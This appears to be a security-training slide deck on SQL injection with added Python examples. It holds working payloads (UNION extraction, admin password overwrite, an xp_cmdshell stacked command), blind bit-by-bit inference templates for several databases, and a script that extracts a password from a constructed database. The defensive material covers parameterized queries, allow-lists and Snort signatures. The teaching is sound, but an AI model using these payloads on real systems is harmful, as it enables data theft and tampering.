Web application attacks using SQL injection and countermeasures

  • 1. SQL INJECTION ATTACKS
       Cade Zvavanjanja, CISO, Gainful Information Security
       Introduction | Background | Techniques | Prevention | Demo | Conclusions | Questions
  • 2. OUTLINE
       - Background of SQL Injection
       - Techniques and Examples
       - Preventing SQL Injection
       - Demo
       - Wrap-Up
       - Questions
  • 3. BACKGROUND OF SQL INJECTION
  • 4. DATABASES: WHERE ARE THEY NOW?
       - Mainframes: fat server
       - Desktop apps: fat client
       - Web apps: fat server and fat client
  • 5. WHY IS SQL A STANDARD?
       - Relational database
       - Platform independence
       - Loose semantics
       - Runtime interpretation
  • 6. FLEXIBILITY = VULNERABILITY
       - Simple injection
       - Decoding error messages
       - Blind injection
       - Encoding exploits
       - Stored procedures
       ---
       - Programmer error (faulty logic)
  • 7. SQL INJECTION TECHNIQUES
  • 8. IMPORTANT SYMBOLS
       '     "hack": closes the application's string literal, so whatever follows is parsed as SQL
       --    "comment out": discards the rest of the statement (MySQL needs a space after it and also accepts #)
       ;     "end statement": starts a second, stacked statement where the driver allows it
       %, *  "wildcards": % (and _) in LIKE patterns; * for every column in SELECT
  • 9. SQL INJECTION DEFINITION
       The input field is modified in such a way that the database returns (or changes) unintended data.
       SQL: SELECT <column name> FROM <table name> WHERE <logic expression>
  • 10. EXAMPLE: DATABASE SCHEMA
       - Table Users: has columns "username" and "password"; accessed when users log in
       - Table Customers: has column "phone"; users can look up other customers' phone numbers by name
       - The application does no input validation
  • 11. RETURNING EXTRA ROWS WITH "UNION"
       Query: SELECT phone FROM Customers WHERE last_name = '<name>'
       Input: x' UNION SELECT username FROM users WHERE 'x' = 'x
       Result: SELECT phone FROM Customers WHERE last_name = 'x' UNION SELECT username FROM users WHERE 'x' = 'x'
       (the trailing 'x' = 'x re-uses the application's own closing quote, so the statement stays balanced, and the phone column now carries usernames)
  • 12. MODIFYING RECORDS
       The application has a password-changing page.
       SQL: UPDATE users SET password = '<newpassword>' WHERE username = '<username>'
       Input (as the new password): newpassword' WHERE username LIKE '%admin%' --
       Result: UPDATE users SET password = 'newpassword' WHERE username LIKE '%admin%' --' WHERE username = '<username>'
       (the attacker's WHERE replaces the application's, and -- discards the rest)
  • 13. MS SQL SERVER
       - Default SQL Server setup (SQL Server 2000 and earlier): system admin account "sa" enabled with no password!!!
       - Supports multiple (stacked) queries in one batch
       - "Extended stored procedures": C/C++ DLL files
         - read/write external files
         - access the command line (xp_cmdshell)
  • 14. EXPLOITING SQL SERVER
       Use the phone look-up query again: SELECT phone FROM customers WHERE last_name = '<name>'
       Input: '; exec master..xp_cmdshell 'iisreset'; --
       Result: SELECT phone FROM customers WHERE last_name = ''; exec master..xp_cmdshell 'iisreset'; --'
       (the harmless look-up is followed by a stacked command that restarts IIS; since SQL Server 2005 xp_cmdshell is disabled by default and has to be enabled with sp_configure, which is itself possible if the application connects as sa)
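The three attacks of slides 11, 12 and 14 run end to end, as an added example that is not part of the deck: the schema and rows are constructed to match slide 10, and an in-memory SQLite database stands in for the SQL Server / MySQL back ends so the script runs anywhere. The UNION and UPDATE payloads are exactly the slides' payloads, since they rely only on standard quoting, UNION and comment syntax. Slide 14's stacked statement is the one that depends on the driver, and the last function shows that dependency: Python's sqlite3 refuses a second statement, whereas a SQL Server batch would run it.

```python
"""Added example (not from the slides): slides 11, 12 and 14 against SQLite."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data matching the deck's schema (slide 10)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE customers (last_name TEXT, phone TEXT);
        INSERT INTO users VALUES ('admin', 'S3cret!'), ('bob', 'hunter2');
        INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0199');
        """
    )
    return conn


def phone_lookup_vulnerable(conn, name: str) -> list:
    """Slide 11's look-up: the user's input is pasted straight into the SQL."""
    sql = "SELECT phone FROM customers WHERE last_name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def change_password_vulnerable(conn, username: str, new_password: str) -> None:
    """Slide 12's password change, built the same way."""
    sql = ("UPDATE users SET password = '" + new_password
           + "' WHERE username = '" + username + "'")
    conn.execute(sql)


def union_attack(conn) -> list:
    """Slide 11 payload: close the string, append a UNION that reads another
    table, and balance the application's trailing quote with 'x' = 'x."""
    payload = "x' UNION SELECT username FROM users WHERE 'x' = 'x"
    return phone_lookup_vulnerable(conn, payload)


def update_attack(conn) -> dict:
    """Slide 12 payload, sent by user bob as his new password: the injected
    WHERE targets admin and -- discards the application's own WHERE."""
    payload = "pwned' WHERE username LIKE '%admin%' --"
    change_password_vulnerable(conn, "bob", payload)
    return dict(conn.execute("SELECT username, password FROM users"))


def stacked_query_accepted(conn) -> bool:
    """Slides 13-14 depend on stacked statements ('; exec ...). Whether they
    run is a driver property: SQL Server batches allow them, while Python's
    sqlite3.execute() refuses a second statement outright."""
    payload = "x'; UPDATE users SET password = 'owned' WHERE 'x' = 'x"
    try:
        phone_lookup_vulnerable(conn, payload)
        return True
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return False


if __name__ == "__main__":
    db = build_db()
    print("UNION leaks:", union_attack(db))
    print("after UPDATE injection:", update_attack(db))
    print("stacked statement accepted:", stacked_query_accepted(db))
```

Run it as a script: the UNION look-up returns the two usernames instead of a phone number, bob's "new password" resets admin's password to pwned while his own is untouched, and the stacked statement is rejected by this driver. The same concatenated SQL sent through a driver that allows batches (ODBC to SQL Server, or PHP's mysqli_multi_query) would run the second statement, which is why "does the driver stack?" is one of the first things to establish when testing.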
  • 15. DATA-MINING WITH SQL INJECTION
       Three classes of data-mining: in-band, out-of-band, inference
  • 16. IN-BAND ATTACKS
       - Data is included in the response from the web server
       - Could be a well-rendered web page (using UNION SELECTs) or an error message
  • 17. OUT-OF-BAND ATTACKS
       Data is retrieved over another communication channel:
       - UTL_HTTP.REQUEST (Oracle: an HTTP request carrying the data to a server the attacker watches)
       - OPENROWSET (SQL Server: a connection out to an attacker-controlled database)
       - XP_SENDMAIL (SQL Server: e-mail)
  • 18. INFERENCE ATTACKS
       - At the core of inference is a question
       - Action is taken based upon the answer
       - Chris Anley's time delay (SQL Server):
         declare @s varchar(8000)
         select @s = db_name()
         if (ascii(substring(@s, 1, 1)) & (power(2, 0))) > 0 waitfor delay '0:0:5'
       (the response is delayed five seconds only if the lowest bit of the first character of the database name is set; repeating the test for each bit of each byte recovers the whole string without any data appearing in the page)
  • 19. INFERENCE ATTACKS, CONT.
       Examples:
       - Time delay
       - Generate 200/500 responses
       - Response variation
       - Wildly silly example: send mail to tech support of XYZ Corp about a modem problem or a monitor problem; if the call comes back about a modem problem, we know the answer
  • 20. INFERENCE ATTACKS, CONT.
       CASE statements in SQL: SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END
  • 21. INFERENCE THROUGH WEB SERVER RESPONSE CODES
       Need a query that compiles fine but generates an error when one branch executes:
       SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
  • 22. INFERENCE THROUGH WEB SERVER RESPONSE CODES, CONT.
       Notes:
       - Works well with SQL Server, Oracle, DB2
       - MySQL returns NULL for 1/0 instead of raising an error, so use response variation there
       - The Informix ODBC driver returns 200 even in the event of an error
       - The response code could be 302 Redirect, etc.; the principle is the same
       - Leaves a large number of 500 responses in the log files
       - App environments like PL/SQL (Oracle's mod_plsql) return 404 instead of 500
  • 23. INFERENCE THROUGH RESPONSE VARIATIONS
       - Parameter splitting and balancing
       - Avoids 500 responses
  • 24. PARAMETER SPLITTING AND BALANCING
       String parameter, step by step (the query keeps returning the same rows as long as the sub-select supplies the missing piece):
       - 'NGSSOFTWARE'
       - 'NGSSOFTWA'+'RE'  (SQL Server concatenation)
       - 'NGSSOFTWA'||'RE'  (Oracle concatenation)
       - 'NGSSOFTWA'|| (SUBSELECT RETURNS R) || 'E'
       - 'NGSSOFTWA' + (SUBSELECT RETURNS R) + 'E'
       Numeric parameter:
       - 2
       - 1 + 1
       - 1 + (SUBSELECT RETURNS 1)
  • 25. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS
       - ColdFusion: converts " to &quot;, & to &amp;, > to &gt;, < to &lt;, and doubles up single quotes
         - usually means the attack vector is numeric input
       - PHP: magic_quotes_gpc (removed in PHP 5.4) backslash-escapes single quotes in request data, so again look for numeric parameters
  • 26. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS, CONT.
       - Rather than > use BETWEEN X AND Y
       - Rather than & use ^ (XOR): A XOR BIT = C
         - if C is greater than A then the bit is not set
         - if C is less than A then the bit is set
       - Rather than 'A' use CHR(65) (Oracle) / CHAR(65) (SQL Server, MySQL)
  • 27. INFERENCE QUERIES: SQL SERVER, STRING DATA
       ' + (select case when ascii(substring((sub-query),the_byte,1))^the_bit between 0 and ascii(substring((sub-query),the_byte,1)) then char(known_value) else char(1/0) end) + '
  • 28. INFERENCE QUERIES: ORACLE, NUMERIC
       + (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then 0 else 1/0 end from dual)
  • 29. INFERENCE QUERIES: ORACLE, STRING DATA
       '|| (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then chr(known_val) else chr(1/0) end from dual) ||'
  • 30. INFERENCE QUERIES: MYSQL, NUMERIC
       + (select case when (ascii(substring((sub-query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end)
       (uses page response variation, since MySQL does not raise an error on 1/0)
  • 31. INFERENCE QUERIES: MYSQL, STRING DATA
       ' + (select case when (ascii(substring((sub-query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + '
       (one value returns no recordset, the other returns all rows: MySQL's + is numeric, so the string parameter is coerced to 0 and compared with 0 or 1)
  • 32. INFERENCE QUERIES: INFORMIX, NUMERIC
       + (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables), "{",123, "|",124, "}",125, "~",126, "!",33, "$",36, "(",40, ")",41, "*",42, ",",44, "-",45, ".",46, "/",47, " ",32, ":",58, ";",59, "_",95, "\",92, ".",46, "?",63, "-",45, "0",48, "1",49, "2",50, "3",51, "4",52, "5",53, "6",54, "7",55, "8",56, "9",57, "@",64, "A",65, "B",66, "C",67, "D",68, "E",69, "F",70, "G",71, "H",72, "I",73, "J",74, "K",75, "L",76, "M",77, "N",78, "O",79, "P",80, "Q",81, "R",82, "S",83, "T",84, "U",85, "V",86, "W",87, "X",88, "Y",89, "Z",90, "a",97, "b",98, "c",99, "d",100, "e",101, "f",102, "g",103, "h",104, "i",105, "j",106, "k",107, "l",108, "m",109, "n",110, "o",111, "p",112, "q",113, "r",114, "s",115, "t",116, "u",117, "v",118, "w",119, "x",120, "y",121, "z",122, 63) from sysmaster:informix.systables), the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables) - 1
       (DECODE maps the character to its code because Informix has no ascii(); the trailing 63 is the default, '?'; 1/bitval(2,1) is 1/0 and raises the error)
  • 33. INFERENCE QUERIES: INFORMIX, STRING DATA
       ' || (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables), "{",123, "|",124, "}",125, "~",126, "!",33, "$",36, "(",40, ")",41, "*",42, ",",44, "-",45, ".",46, "/",47, " ",32, ":",58, ";",59, "_",95, "\",92, ".",46, "?",63, "-",45, "0",48, "1",49, "2",50, "3",51, "4",52, "5",53, "6",54, "7",55, "8",56, "9",57, "@",64, "A",65, "B",66, "C",67, "D",68, "E",69, "F",70, "G",71, "H",72, "I",73, "J",74, "K",75, "L",76, "M",77, "N",78, "O",79, "P",80, "Q",81, "R",82, "S",83, "T",84, "U",85, "V",86, "W",87, "X",88, "Y",89, "Z",90, "a",97, "b",98, "c",99, "d",100, "e",101, "f",102, "g",103, "h",104, "i",105, "j",106, "k",107, "l",108, "m",109, "n",110, "o",111, "p",112, "q",113, "r",114, "s",115, "t",116, "u",117, "v",118, "w",119, "x",120, "y",121, "z",122, 63) from sysmaster:informix.systables), the_bit) between 1 and 255 then 'xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) || '
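The inference technique of slides 18 through 31 carried through in working code, as an added example that is not part of the deck. The application exposes only one bit per request, whether the phone look-up found a row (the response variation of slide 23), and the payload combines the parameter splitting and balancing of slide 24 with the bit test of slides 26 and 27 to recover a secret one bit at a time. The database is an in-memory SQLite instance with constructed data: SQLite has no db_name(), so the sub-query reads the admin password instead; unicode() replaces ascii(); || is its concatenation operator; and because 1/0 yields NULL in SQLite, as in MySQL (slide 22), the error-based branch of slides 27 to 29 is replaced by the MySQL-style found/not-found variation of slides 30 and 31.

```python
"""Added example (not from the slides): boolean inference against SQLite."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data matching the deck's schema (slide 10)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE customers (last_name TEXT, phone TEXT);
        INSERT INTO users VALUES ('admin', 'Pa55w0rd!'), ('bob', 'hunter2');
        INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0199');
        """
    )
    return conn


def customer_exists(conn, name: str) -> bool:
    """The vulnerable look-up, reduced to the one bit an attacker can observe:
    did the page render a result or not."""
    sql = "SELECT phone FROM customers WHERE last_name = '" + name + "'"
    return conn.execute(sql).fetchone() is not None


# The sub-query whose result we want to read (stands in for db_name()).
SUB_QUERY = "(SELECT password FROM users WHERE username = 'admin')"


def bit_is_set(conn, position: int, bit: int) -> bool:
    """Ask one yes/no question: is `bit` set in byte `position` of the secret?

    Parameter splitting and balancing: the known value 'Smith' is sent as
    'Smi' || X || '' where X is 'th' when the bit is set and 'xx' when it is
    not, so the statement stays syntactically valid and only the answer
    changes. COALESCE turns the NULL past the end of the string into 0."""
    test = ("(COALESCE(unicode(substr(%s, %d, 1)), 0) & %d) > 0"
            % (SUB_QUERY, position, bit))
    payload = "Smi' || (SELECT CASE WHEN %s THEN 'th' ELSE 'xx' END) || '" % test
    return customer_exists(conn, payload)


def extract_secret(conn, max_len: int = 64) -> str:
    """Recover the secret byte by byte, one request per bit."""
    out = []
    for pos in range(1, max_len + 1):       # substr() positions are 1-based
        byte = 0
        for bit in (1, 2, 4, 8, 16, 32, 64, 128):
            if bit_is_set(conn, pos, bit):
                byte |= bit
        if byte == 0:                       # past the end of the string
            break
        out.append(chr(byte))
    return "".join(out)


if __name__ == "__main__":
    db = build_db()
    print("recovered:", extract_secret(db))
```

Each character costs eight requests and nothing about the secret ever appears in a page, which is why inference attacks leave so little in application logs; the tell is the volume of near-identical requests whose only variation is inside the parameter. The same loop drives the error-based and time-delay variants: only the oracle function changes, to a check on the status code or on the round-trip time.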
  • 34. PREVENTING SQL INJECTION
  • 35. PREVENTING SQL INJECTION
       - Input validation
       - Input checking functions
       - Access rights
       - User permissions
       - Variable placeholders
       - Stored procedures
  • 36. INPUT VALIDATION
       Checks: type, size, format, range; replace quotation marks.
       "All input is wrong and dangerous"
  • 37. INPUT CHECKING FUNCTIONS
       Built-in character rejection (PHP):
       // vulnerable: the raw value is pasted into the statement
       $sql = "SELECT * FROM Users WHERE ID = '" . $_GET['id'] . "'";
       // escaped: quotes and backslashes in the value are escaped, and the value stays inside quotes
       $sql = "SELECT * FROM Users WHERE ID = '" . mysql_real_escape_string($_GET['id']) . "'";
       $result = mysql_query($sql);
       Note: the escaped value must remain quoted; an unquoted numeric parameter such as ID = 1 OR 1=1 contains nothing for the function to escape. mysql_real_escape_string also needs an open connection, and the mysql_* functions were removed in PHP 7 (use mysqli or PDO prepared statements).
  • 38. ACCESS RIGHTS
       Web user vs. system administrator ('sa'): the application should never connect as sa.
  • 39. USER PERMISSIONS
       - Limit query access rights: SELECT, UPDATE, DROP
       - Restricted statement access: global, database-specific, table-specific
  • 40. VARIABLE PLACEHOLDERS (?)
       - Defence from string concatenation
       - Enforcing database data types
       PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?");
       prep.setString(1, pwd);
  • 41. STORED PROCEDURES
       - Use error-checking variables
       - Buffer direct database access
       (a stored procedure only helps when the values arrive as typed parameters; one that builds dynamic SQL from them by concatenation is just as injectable as the application code it replaced)
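The look-up and password change of slides 11 and 12 rewritten with the defences of slides 36 through 41, as an added example that is not part of the deck, using Python's sqlite3 module. The ? placeholder is the variable placeholder of slide 40; the allow-list regex is the type/size/format check of slide 36 (the rule itself is an assumption for the demo); and PRAGMA query_only stands in for a read-only database account (slides 38 and 39), since SQLite has no user permissions. Schema and rows are constructed.

```python
"""Added example (not from the slides): the same queries, parameterized."""
import re
import sqlite3

# Allow-list for a surname: a letter, then letters, spaces, apostrophes or
# hyphens (an assumption for the demo; real rules follow the application's data).
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z '\-]{0,39}$")


def build_db() -> sqlite3.Connection:
    """Constructed sample data matching the deck's schema (slide 10)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE customers (last_name TEXT, phone TEXT);
        INSERT INTO users VALUES ('admin', 'S3cret!'), ('bob', 'hunter2');
        INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0199');
        """
    )
    return conn


def phone_lookup_parameterized(conn, name: str) -> list:
    """Slide 40's placeholder: the SQL text is fixed and the value travels
    separately, so quotes inside it can never change the statement."""
    rows = conn.execute("SELECT phone FROM customers WHERE last_name = ?", (name,))
    return [r[0] for r in rows]


def phone_lookup_validated(conn, name: str) -> list:
    """Slide 36's validation layered on top: reject junk early, but the
    placeholder is still what stops injection."""
    if not NAME_RE.fullmatch(name):
        raise ValueError("rejected by allow-list: %r" % name)
    return phone_lookup_parameterized(conn, name)


def change_password_parameterized(conn, username: str, new_password: str) -> int:
    """Slide 12's password change with placeholders; returns rows updated.
    The slide's payload now becomes, literally, the user's new password."""
    cur = conn.execute("UPDATE users SET password = ? WHERE username = ?",
                       (new_password, username))
    return cur.rowcount


def dump_users(conn) -> dict:
    """Current username -> password mapping, for checking what changed."""
    return dict(conn.execute("SELECT username, password FROM users"))


def read_only(conn) -> sqlite3.Connection:
    """Stand-in for a least-privilege account (slides 38-39): SQLite has no
    users, so the connection itself is made read-only."""
    conn.execute("PRAGMA query_only = 1")
    return conn


def write_blocked(conn) -> bool:
    """True if the connection refuses a write that the SQL itself allows."""
    try:
        conn.execute("UPDATE users SET password = 'owned'")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = build_db()
    print(phone_lookup_parameterized(db, "x' UNION SELECT username FROM users WHERE 'x' = 'x"))
    print(change_password_parameterized(db, "bob", "pwned' WHERE username LIKE '%admin%' --"))
    print(dump_users(db))
    print(write_blocked(read_only(db)))
```

The UNION payload now returns an empty list because the database looked for a customer literally named x' UNION SELECT ...; bob's "new password" is stored as that string and admin's is untouched. The read-only connection is the layer that matters when the other two fail: even a perfectly injectable query cannot UPDATE or DROP through an account that holds only SELECT on the tables the page needs.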
  • 42. DEMONSTRATION
  • 43. COUNTERMEASURES
       System administrators:
       - white-list / black-list input validation
       - least privileges
       - application firewalls
       Developers:
       - stored procedures
       - parameterized queries
       - exception handling
  • 44. WHITELIST INPUT VALIDATION
       UrlScan v3.0 restricts the types of HTTP requests that IIS will process:
       [SQL Injection Headers]
       AppliesTo=.asp,.aspx
       [SQL Injection Headers Strings]
       --
       @          ; also catches @@
       alter
       delete
       drop
       exec
       insert
       Snort: create a rule to check for SQL attack strings in request URIs:
       alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection"; flow:to_server,established; uricontent:".php | .aspx | .asp"; pcre:"/(%27)|(')|(--)|(%23)|(#)/i"; classtype:web-application-attack; sid:9099; rev:5;)
       (both are signature black-lists rather than white-lists: the pcre fires on every apostrophe, and in Snort a | inside a content string delimits hex bytes rather than alternatives, so the uricontent above does not match three extensions)
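The two styles of check from slide 44 run side by side over constructed web-server log lines, as an added example that is not part of the deck: the black-list is the pcre from the slide's Snort rule, and the white-list is an allow-list for the one parameter the look-up page takes. The log lines, the endpoint name and the allow-list rule are assumptions for the demo.

```python
"""Added example (not from the slides): black-list vs white-list over log lines."""
import re
from urllib.parse import parse_qs, urlsplit

# The pcre from the slide's Snort rule: an apostrophe (raw or %27), "--" or
# a hash sign anywhere in the URI.
BLACKLIST = re.compile(r"(%27)|(')|(--)|(%23)|(#)", re.IGNORECASE)

# Allow-list for a surname (assumption for the demo): letters, spaces,
# apostrophes and hyphens only.
NAME_OK = re.compile(r"^[A-Za-z][A-Za-z' -]{0,39}$")

# Constructed Common Log Format lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2024:10:00:01 +0000] "GET /phone.php?name=Smith HTTP/1.1" 200 312
10.0.0.6 - - [01/May/2024:10:00:02 +0000] "GET /phone.php?name=O%27Brien HTTP/1.1" 200 298
10.0.0.7 - - [01/May/2024:10:00:03 +0000] "GET /phone.php?name=x%27%20UNION%20SELECT%20username%20FROM%20users%20WHERE%20%27x%27%3D%27x HTTP/1.1" 200 851
10.0.0.8 - - [01/May/2024:10:00:04 +0000] "GET /phone.php?name=1%20OR%201%3D1 HTTP/1.1" 200 851
10.0.0.9 - - [01/May/2024:10:00:05 +0000] "GET /phone.php?name=x%27%20OR%20%27a%27%20LIKE%20%27a HTTP/1.1" 200 851
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def request_uris(log: str) -> list:
    """Pull the request URI out of each log line."""
    return [m.group("uri") for m in (REQUEST_RE.search(l) for l in log.splitlines()) if m]


def blacklist_hits(log: str) -> list:
    """URIs the Snort-style pattern would alert on (raw URI, as the IDS sees it)."""
    return [uri for uri in request_uris(log) if BLACKLIST.search(uri)]


def whitelist_rejects(log: str) -> list:
    """URIs whose decoded 'name' parameter fails the allow-list (as the
    application sees it, after percent-decoding)."""
    rejects = []
    for uri in request_uris(log):
        name = parse_qs(urlsplit(uri).query).get("name", [""])[0]
        if not NAME_OK.fullmatch(name):
            rejects.append(uri)
    return rejects


if __name__ == "__main__":
    print("black-list alerts:", blacklist_hits(SAMPLE_LOG))
    print("white-list rejects:", whitelist_rejects(SAMPLE_LOG))
```

The output shows why neither list is sufficient on its own: the black-list alerts on O'Brien (a false positive) and misses 1 OR 1=1 (no apostrophe), while the white-list accepts x' OR 'a' LIKE 'a because apostrophes have to be allowed in surnames. Validation narrows what reaches the query; the placeholder is what makes whatever reaches it harmless.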
  • 45. LEAST PRIVILEGES
       - Enforce least privileges: the application's account should not hold CREATE / DELETE (DROP) rights
       - Does not guarantee security
       - Access to a portion of the data only: create views
  • 46. CONCLUSIONS
       - SQL injection continues to evolve with new technologies
       - Dangerous effects: access to critical information; updating data not meant to be updated; exploiting the DBMS to directly affect the server and its resources
       - Prevention of SQL injection: input validation and query building; permissions and access rights; variable placeholders (prepare) and stored procedures
  • 47. QUESTIONS
       1) What could prevent the 'Students' table from being dropped?
       2) What is another way to prevent injection?
  • 48. REFERENCES
       - Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual, PHP Documentation Group, 13 January 2005. Retrieved 7 April 2005 from http://www.php-center.de/en-html-manual/security.database.sql-injection.html
       - Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, 1989. 427-433.
       - "Exploits of a Mom." xkcd.com. Retrieved 4 March 2008 from http://xkcd.com/327/
       - Finnigan, Pete. "SQL Injection and Oracle, Part One." SecurityFocus, 21 November 2002. Retrieved 7 April 2005 from http://www.securityfocus.com/infocus/1644
       - Harper, Mitchell. "SQL Injection Attacks: Are You Safe?" Dev Articles, 29 May 2002. Retrieved 7 April 2005 from http://www.devarticles.com/c/a/MySQL/SQL-Injection-Attacks-Are-You-Safe/2/
  • 49. THANK YOU
       Tel: +236 733 782 490, +263 773 796 365, +263 -4- 733 117
       Email: info@gis.co.zw, cade@gis.co.zw
       Web: www.gis.co.zw

Speaker notes

  1. RFID virus uses MS SQL Server commands.
  2. PHP example
  3. May remove this slide
  4. http://sacs.ucf.edu/ccr/cct_welcome.asp
  5. What is white-list/black-list input validation? Explain. Choose white-list over black-list: it is much easier to accept valid states than it is to deny them.
  6. This will not prevent SQL injection attacks but it will minimize them. Create/Delete: your application will most likely never have to create and drop tables at runtime. Elevation of privileges. Views should only access data that is required for the application.